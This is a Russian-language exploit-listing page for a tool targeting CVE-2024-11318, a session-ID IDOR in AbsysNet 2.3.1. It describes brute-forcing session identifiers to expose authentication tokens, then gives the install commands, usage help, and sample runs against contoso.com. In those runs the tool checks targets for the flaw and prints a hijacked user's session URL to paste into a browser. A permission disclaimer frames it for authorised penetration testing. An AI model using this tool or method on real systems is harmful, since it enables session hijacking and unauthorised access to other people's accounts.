## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-XTHALACH-CVE-2024-11318
# CVE-2024-11318 (IDOR - Угон пользователей AbsysNet 2.3.1)
* * *
# ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ
Этот инструмент предназначен для помощи в выявлении и эксплуатации уязвимости CVE-2024-11318 в приложениях. Он предназначен для использования специалистами по кибербезопасности, исследователями и тестировщиками на проникновение для оценки безопасности в средах, где у них есть явное разрешение.
Если уязвимость подтверждена, эксплуатация должна проводиться только при наличии надлежащего разрешения от владельца приложения или системы.
_**Несанкционированное использование этого инструмента против систем или сетей, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным. Автор не несет ответственности за неправомерное использование или ущерб, причиненный этим инструментом.**_
Используя этот инструмент, вы соглашаетесь соблюдать все соответствующие законы и этические нормы. Всегда убедитесь, что у вас есть явное разрешение, прежде чем проводить тесты или эксплуатировать уязвимости.
* * *
## ОПИСАНИЕ
Эта уязвимость затрагивает AbsysNet версии 2.3.1 и позволяет удаленному злоумышленнику скомпрометировать сеанс активного пользователя. Атака основана на эксплуатации уязвимости IDOR (Insecure Direct Object Reference) в конечной точке /cgi-bin/ocap/, где идентификатор сеанса подвержен перебору.
После успешного подбора идентификатора сеанса, связанного с аутентифицированным пользователем, токен аутентификации раскрывается в HTML-коде. Однако атака ограничена активными сеансами, и если пострадавший пользователь выйдет из системы, доступ злоумышленника немедленно прекращается, что ограничивает устойчивость компрометации.
С помощью этой уязвимости можно перехватить только сеансы пользователей, которые в данный момент вошли в систему, и если текущий пользователь выйдет, злоумышленник теряет соединение.
* * *
## УСТАНОВКА
root@kitploit:~
git clone https://github.com/xthalach/CVE-2024-11318.git
cd CVE-2024-11318
python3 -m venv cve-2024-11318
source cve-2024-11318/bin/activate
pip install -r requirements.txt
python3 cve-2024-11318.py
* * *
## ИСПОЛЬЗОВАНИЕ
root@kitploit:~
python3 cve-2024-11318.py
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗ ██╗██████╗ ██╗ █████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ███║███║╚════██╗███║██╔══██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ██║ ██║██████╔╝ ██║╚█████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚════╝
ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
usage: CVE-2024-11318.py [-h] -u URL [--check] [--exploit]
Этот скрипт позволяет оценить, уязвим ли сайт для CVE-2024-11318. В случае подтверждения предоставляется возможность эксплуатации уязвимости, но только при наличии явного разрешения.
options:
-h, --help show this help message and exit
-u URL, --url URL Целевой URL
--check Эта опция позволяет проверить, уязвим ли сайт для CVE-2024-11318.
--exploit Эта опция позволяет эксплуатировать уязвимость CVE-2024-11318.
## \--CHECK
* Уязвим
root@kitploit:~
└─$ python3 CVE-2024-11318.py -u 'https://www.contoso.com/cgi-bin/opac/O7375/ID009a7a6e?ACC=101' --check
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗ ██╗██████╗ ██╗ █████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ███║███║╚════██╗███║██╔══██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ██║ ██║██████╔╝ ██║╚█████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚════╝
ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
[|] НАЧАЛО АТАКИ: ПРОВЕРКА, УЯЗВИМА ЛИ ЦЕЛЬ!
[*] ПРОВЕРКА URL: https://www.contoso.com/cgi-bin/opac/O7375/?ACC=101
[+] УЯЗВИМ: Токен 'ID009a7a6e' найден в HTML-коде.
* Не уязвим
root@kitploit:~
└─$ python3 CVE-2024-11318.py -u 'https://contoso.com/cgi-bin/abnetopac/O7fbxZNd3yjeqX7isbLYjGeEUqX?ACC=101' --check
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗ ██╗██████╗ ██╗ █████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ███║███║╚════██╗███║██╔══██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ██║ ██║██████╔╝ ██║╚█████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚════╝
ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
[q] НАЧАЛО АТАКИ: ПРОВЕРКА, УЯЗВИМА ЛИ ЦЕЛЬ!
[←] ПРОВЕРКА URL: https://contoso.com/cgi-bin/abnetopac/O7fbxZNd3yjeqX7isbLYjGeEUqX?ACC=101
[-] НЕ УЯЗВИМ: Приложение исправлено, значение токена "O7fbxZNd3yjeqX7isbLYjGeEUqX" не совпадает.
## \--EXPLOIT
root@kitploit:~
└─$ python3 CVE-2024-11318.py -u 'https://www.contoso.com/cgi-bin/opac/O7067/ID5c22d860?ACC=101' --exploit
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗ ██╗██████╗ ██╗ █████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ███║███║╚════██╗███║██╔══██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ██║ ██║██████╔╝ ██║╚█████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚════╝
ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
[█] НАЧАЛО АТАКИ: ЭКСПЛУАТАЦИЯ ЦЕЛИ!
[*] --- ЗАПУСК ЭКСПЛОЙТА ---
[b] URL: https://www.contoso.com/cgi-bin/opac/O7099/?ACC=101
[+] Угон токена пользователя: https://www.contoso.com/cgi-bin/opac/O7054/ID9f842d80?ACC=101 (СКОПИРУЙТЕ И ВСТАВЬТЕ В БРАУЗЕР)